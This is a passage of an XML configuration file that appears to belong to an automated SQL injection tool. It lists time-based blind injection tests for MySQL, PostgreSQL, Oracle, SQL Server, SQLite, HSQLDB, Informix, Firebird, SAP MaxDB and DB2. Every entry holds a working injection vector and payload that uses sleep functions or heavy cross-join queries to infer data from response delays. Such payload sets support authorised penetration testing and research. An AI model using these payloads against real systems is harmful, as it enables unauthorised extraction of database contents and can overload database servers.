<details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>\n        <request>\n            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n\n    <!-- End of time-based boolean tests -->\n\n    <!-- Time-based boolean tests - Numerous clauses -->\n    <!-- This payload does not work with SLEEP() -->\n    <test>\n        <title>MySQL &gt;= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>\n        <request>\n            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>\n        <request>\n            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n    <!-- End of time-based boolean tests - Numerous clauses -->\n\n    <!-- Time-based boolean tests - Parameter replace -->\n    <test>\n        <title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (BENCHMARK)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector>\n        <request>\n            <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt; 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>\n        <request>\n            <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL time-based blind - Parameter replace (bool)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL time-based blind - Parameter replace (ELT)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->\n    <test>\n        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3,9</clause>\n        <where>3</where>\n        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>\n        <request>\n            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>\n        <request>\n            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>\n        <request>\n            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>\n        <request>\n            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>\n        <request>\n            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <!-- Untested -->\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix time-based blind - Parameter replace (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n    <!-- End of time-based boolean tests - Parameter replace -->\n\n    <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->\n    <test>\n        <title>MySQL &gt;= 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 time-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        